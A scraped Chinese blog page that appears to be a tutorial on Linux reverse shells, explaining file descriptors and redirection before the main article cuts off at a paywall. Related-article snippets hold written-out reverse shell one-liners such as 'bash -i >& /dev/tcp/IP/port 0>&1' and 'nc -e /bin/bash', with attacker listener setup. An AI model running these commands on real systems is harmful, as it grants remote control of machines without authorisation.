linux下的shell反弹

最新推荐文章于 2024-07-10 14:16:48 发布
最新推荐文章于 2024-07-10 14:16:48 发布
阅读量267 收藏
点赞数
文章标签: linux shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ITgougou_/article/details/109322132
版权

linux下的shell反弹设计重定向,文件描述符等内容

 

01 linux的文件描述符

可以理解为linux跟踪打开文件,而分配的一个数字,这个数字有点类似c语言操作文件时候的句柄,通过句柄就可以实现文件的读写操作。

当Linux启动的时候会默认打开三个文件描述符,分别是:

标准输入standard input 0 (默认设备键盘)
标准输出standard output 1(默认设备显示器)
错误输出:error output 2(默认设备显示器)

下面引用先知社区对文件描述符的脑涂:

文件所有输入输出都是由该进程所有打开的文件描述符控制的。(Linux一切皆文件,就连键盘显示器设备都是文件,因此他们的输入输出也是由文件描述符控制)

一条命令执行以前先会按照默认的情况进行绑定(也就是上面所说的 0,1,2),如果我们有时候需要让输出不显示在显示器上,而是输出到文件或者其他设备,那我们就需要重定向。

(1)输入重定向 < <<
(2)输出重定向 > >>

对>&这个符号的含义理解:

当>&后面接文件时,表示将标准输出和标准错误输出重定向至文件

当>&后面接文件描述符(0,1,2)时,表示将文件重定向至文件描述符(所代表的含义)

 02 Linux bash反弹shell解析

反弹原因:网络环境(内网下短机器),防火墙受限(限制入站规则),权限维持(目标会更换域名,ip等)....

bash反弹


                

        

        

    




        

            

                    
                      最低0.47元/天 解锁文章
                        
                    
            

        

    

      

        

            

              
                
                  Three ooo
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                      0
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    0
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      










                



	

		

			

				
					
python反弹shell_反弹shell的几种方式总结

				
			

			

				

					weixin_34653651的博客
				

				

					01-15
					
					4272
					
				

			

		

		

			
				
假设本机地址10.10.10.11,监听端口443。1、Bash环境下反弹TCP协议shell首先在本地监听TCP协议443端口nc-lvp443然后在靶机上执行如下命令:bash-i>&/dev/tcp/10.10.10.11/4430>&1/bin/bash-i>/dev/tcp/10.10.10.11/4430&1exec5&l...

			
		

	



                

              
                



	

		

			

				
					
Linux反弹shell

				
			

			

				

					weixin_64338385的博客
				

				

					11-26
					
					2273
					
				

			

		

		

			
				
0x01. bash

反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。

在攻击主机上执行端口监听:

nc -lvvp port //port 为攻击主机端口





在目标主机上执行:

bash -i >& /dev/tcp/攻击主机i...

			
		

	



                


  
              

                


	

		

			

				
					
实现交互式shell的几种方式:python pty 方式、升级nc、socat、script获取pty

					
热门推荐

				
			

			

				

					闵行小鱼塘
				

				

					06-04
					
					1万+
					
				

			

		

		

			
				
当我们拿到一个webshell的时候,我们能够执行一些命令,但是这些命令都是非交互的,也就是说不存在上下文的概念。当我们想使用vim、top等命令时,webshell就无能为力了。

那我们怎么获取一个可交互的webshell呢?

			
		

	





	

		

			

				
					
Linux反弹shell

				
			

			

				

					good good study
				

				

					04-21
					
					4175
					
				

			

		

		

			
				
在渗透过程中,目标处于内网环境,或因为端口限制而我们无法直连目标机器,此时需要通过反弹shell来让目标机器主动连接我们获取一个交互式shell,以便继续深入。记录几个常用的。

			
		

	



		

			
		



	

		

			

				
					
LinuxShell 反弹总结

				
			

			

				

					AaronLuo
				

				

					10-14
					
					638
					
				

			

		

		

			
				
当拿到webshell的时候,因为webshell的环境是虚拟终端,不是交互型终端,很多命令是无法执行的,所以需要拿到交互式shell,就得反弹shell
工具准备

VPS(公网ip)
python环境
nc(netcat)
Ubuntu(宿主机)

反弹shell 步骤
首先在vps上使用netcat开启监听
nc -lvnp 8080

参数

-l:使用监听模式,监控传入的资料;
-v:显...

			
		

	





	

		

			

				
					
Linux反弹Shell

				
			

			

				

					m0_73199983的博客
				

				

					03-06
					
					1194
					
				

			

		

		

			
				
被控端主动发起连接请求连接控制,通常被控制端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收送过来的数据包。被控端bash -i>&/dev/tcp/192.168.81.154(控制端IP)/6666 (控制端想要开放的端口号)0>&1bash -i打开一个交互式的bash shell。>&或者&>>&、&>:混合输出(正确、错误的输出都输出到一个地方),将标准输出、错误输出全都重定向到 /dev/tcp/HOST/PORT,即控制端如果不想用>&或者。

			
		

	





	

		

			

				
					
Linux 反弹 Shell

				
			

			

				

					sankgao 的博客
				

				

					01-12
					
					578
					
				

			

		

		

			
				
Linux 反弹 Shell

			
		

	





	

		

			

				
					
linux反弹shell

				
			

			

				

					arissa666的博客
				

				

					11-27
					
					610
					
				

			

		

		

			
				
下面是windows主机找到nc打开1.bat输入:nc 连接的IP地址 端口受害主机是nc -lvvp 端口 -t -e /bin/bashkali系统连接。

			
		

	





	

		

			

				
					
linux反弹shell常用指令

				
			

			

				

					a1_pha的博客
				

				

					01-06
					
					357
					
				

			

		

		

			
				
netstat监听端口。

			
		

	





	

		

			

				
					
linux反弹shell命令解析

				
			

			

				

					原味瓜子、的博客
				

				

					09-29
					
					2222
					
				

			

		

		

			
				
文章目录1. 什么是反弹shell2. 反弹shell的用途3. 反弹shell操作步骤4. 原理
1. 什么是反弹shell
简单来说就是A主机可以通过执行B主机上的命令并且把返回值都返回到A上。
2. 反弹shell的用途
这个反弹shell大部分用途是用来侵入别人的主机。就是因为感觉很厉害的样子,所以才来研究这家伙
3. 反弹shell操作步骤
3.1. 在本机开启端口9090
nc -lk 9090

3.2. 在需要被控制的机器上执行如下两种命令中的一种即可
bash -i >& /

			
		

	





	

		

			

				
					
Linux下NC反弹shell命令(推荐)

				
			

			

				

					09-15
				

			

		

		

			
				
本篇文章将详细介绍如何在Linux下使用`nc`进行反弹Shell操作,并提供其他编程语言的反弹Shell命令作为参考。  首先,攻击者需要在自己的机器上启动一个监听服务来接收目标机器的连接。这通常通过以下`nc`命令完成: ...

			
		

	





	

		

			

				
					
linux反弹shell的原理详解

				
			

			

				

					01-08
				

			

		

		

			
				
反弹shell命令:  bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i > /dev/tcp/ip/port 0>&1 2>&1 利用nc反弹shell:  nc -lvvp 12345 -t -e /bin/bash 原理 bash -i > /dev/tcp/ip/port 0>&1 2>&1 bash -i 打开一...

			
		

	





	

		

			

				
					
不一样的视角剖析Linux 反弹shell水印版.pdf

				
			

			

				

					08-02
				

			

		

		

			
				
本文的标题是"不一样的视角"剖析linux反弹shell,,和业界普遍的视角是不同的,我把它划分更细了。为啥这么做呢?说一下写这篇文章的初衷,一般反弹shell咱们根 据是否是常驻shel划分为交互式与非交互式两种。我个人...

			
		

	





	

		

			

				
					
linux/shelllinux如何去除字符串中空格

				
			

			

				

					qq_35902025的博客
				

				

					07-06
					
					408
					
				

			

		

		

			
				
linux如何去除字符串中空格
tr命令可以用来替换或删除字符
sed是一个流编辑器,可以用来处理文本

			
		

	





	

		

			

				
					
RedHat运维-LinuxSELinux基础4-端口绑定SELinux上下文

				
			

			

				

					a15735748145a的博客
				

				

					07-06
					
					629
					
				

			

		

		

			
				
12. 将60001/tcp端口上的SELinux上下文由http_port_t调整为gopher_port_t的方法是______________________;13. 将60002/tcp端口上的SELinux上下文由gopher_port_t调整为ssh_port_t的方法是______________________;14. 将60003/tcp端口上的SELinux上下文由ssh_port_t调整为http_port_t的方法是_______________________;

			
		

	





	

		

			

				
					
Linux_实现简易日志系统

				
			

			

				

					安权_code的博客
				

				

					07-07
					
					970
					
				

			

		

		

			
				
Linux下实现一个日志系统,该日志系统主要用于打印和记录程序的格式化信息,还可以对信息做分析处理,比如把信息分为五种类型:正常运行信息、测试信息,警告信息,错误信息、致命信息,当然还可以显示信息产生的具体时间,并且能够对这些信息进行存档归类。

			
		

	





	

		

			

				
					
Linux x86_64平台指令替换函数 text_poke_smp/bp

				
			

			

				

					小立仔
				

				

					07-05
					
					892
					
				

			

		

		

			
				
Linux x86_64平台指令替换函数 text_poke_smp/bp简介

			
		

	





	

		

			

				
					
linux积累-core文件是干啥的

				
			

			

				

					hebtu666
				

				

					07-09
					
					525
					
				

			

		

		

			
				
核心转储(core dump)文件是一个程序崩溃时所产生的文件,它记录了程序崩溃时的内存状态,包括程序计数器和寄存器内容等信息。此外,如果程序是在特定的库或者环境中运行时崩溃的,你可能还需要安装那些库的调试符号,并在调试器中设置相应的环境变量。: 当你有了核心转储文件后,你可以使用像GDB(GNU调试器)这样的调试器来分析它。首先,你需要确保你有相应的程序的带调试符号的可执行文件。: 根据调试器提供的信息,你可以检查源代码中可能导致问题的部分,例如无效的指针引用、数组越界或其他违反程序逻辑的操作。

			
		

	





	

		

			

				
					
LVGL ArchLinux VSCode环境运行

					
最新发布

				
			

			

				

					Sandman06的博客
				

				

					07-10
					
					127
					
				

			

		

		

			
				
很多包在Arch中名字都不一样,我配合GPT,找到了相同功能的包,配合官方步骤,大致过程如下。vscode用AUR管理器安装”visual-studio-code-bin“LVGL官方的Demo是跑在Ubuntu系的系统上的。# 用如下指令代替Ubuntu系apt指令。git保证项目完整,各模块更新就能跑起来了。# VSCode安装。

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值